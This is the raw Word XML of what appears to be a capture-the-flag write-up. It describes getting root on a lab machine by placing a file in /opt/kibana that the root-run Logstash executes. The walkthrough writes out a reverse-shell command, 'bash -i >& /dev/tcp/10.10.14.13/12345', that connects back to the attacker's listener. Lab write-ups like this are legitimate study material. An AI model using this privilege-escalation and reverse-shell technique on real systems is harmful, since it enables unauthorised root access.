        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3305E075" wp14:editId="096AC9AD">
            <wp:extent cx="5943600" cy="92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25830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB4137" w14:textId="29997F0A" w:rsidR="00E75AD1" w:rsidRDefault="00E75AD1" w:rsidP="005837BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AB6FF7" w14:textId="45B12AF9" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Getting Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB383F" w14:textId="77777777" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To get root privileges navigate run the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -elf | grep root and see what programs the root user is currently using. One program of interest is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which is part of the elastic stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F231BF" w14:textId="0C3984C2" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15A6BEFA" wp14:editId="36DBA8A0">
            <wp:extent cx="5943600" cy="268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8590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CA724B" w14:textId="333A2613" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In addition, the files located in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>conf.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> contain code that gives away the location that the root users program receives input from and how the program filters user input.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719FC45" w14:textId="57B67335" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15EE335B" wp14:editId="255F651B">
            <wp:extent cx="5943600" cy="3041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1650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E8D27" w14:textId="6DE9B5EF" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="664331A4" w14:textId="77777777" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The input function reveals that the input is taken from any file starting with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_ located in the /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. The filter function shows a grok expression that must be matched for the code in the file to execute successfully (an online grok debugger is helpful here). Once in the /opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener and execute the following command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275956C" w14:textId="433EE740" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ejecutar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/10.10.14.13/12345 0&gt;&amp;1" &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE1A89">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logstash_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0070089F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">It may take a few minutes so be patient, but if all goes well the following shell will be received by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0070089F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0070089F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A4F5A" w14:textId="678BCA39" w:rsidR="0070089F" w:rsidRDefault="0070089F" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2997B9BF" wp14:editId="32B40A6F">
            <wp:extent cx="594360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39F59566" w14:textId="42111C35" w:rsidR="00EE1A89" w:rsidRDefault="00EE1A89" w:rsidP="00EE1A89">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4DC651" w14:textId="609690AB" w:rsidR="0070089F" w:rsidRDefault="0070089F" w:rsidP="0070089F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Some Articles that I found helpful: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0B38D38E" w14:textId="16223E43" w:rsidR="0070089F" w:rsidRDefault="0070089F" w:rsidP="0070089F">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3ABB3EA5" w14:textId="1B80A0DC" w:rsidR="0070089F" w:rsidRDefault="0070089F" w:rsidP="0070089F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://payatu.com/guide-linux-privilege-escalation/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="145EEEEB" w14:textId="77777777" w:rsidR="0070089F" w:rsidRPr="00EE1A89" w:rsidRDefault="0070089F" w:rsidP="0070089F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0070089F" w:rsidRPr="00EE1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3F3"/>
    <w:rsid w:val="00086D06"/>
    <w:rsid w:val="00485DBD"/>
    <w:rsid w:val="00535A1F"/>
    <w:rsid w:val="005837BE"/>
    <w:rsid w:val="00584855"/>
    <w:rsid w:val="006A2BE4"/>
    <w:rsid w:val="0070089F"/>
    <w:rsid w:val="0070092A"/>
    <w:rsid w:val="007563F3"/>
    <w:rsid w:val="007E6EAB"/>
    <w:rsid w:val="007F0436"/>
    <w:rsid w:val="00DF7C06"/>
    <w:rsid w:val="00E72274"/>
    <w:rsid w:val="00E75AD1"/>
    <w:rsid w:val="00EE1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2EC6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FA92AD46-D882-4BF9-8D34-ABF395026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EAB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E6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payatu.com/guide-linux-privilege-escalation/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.115:9200"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www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-i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stackoverflow.com/questions/475074/regex-to-parse-or-validate-base64-data/475217#475217" TargetMode="External"/><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hyperlink" Target="http://10.10.10.115:9200/_all/_search?q=*:*&amp;size=1000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p.carulli</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>p.carulli</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-10T02:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-10T03:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>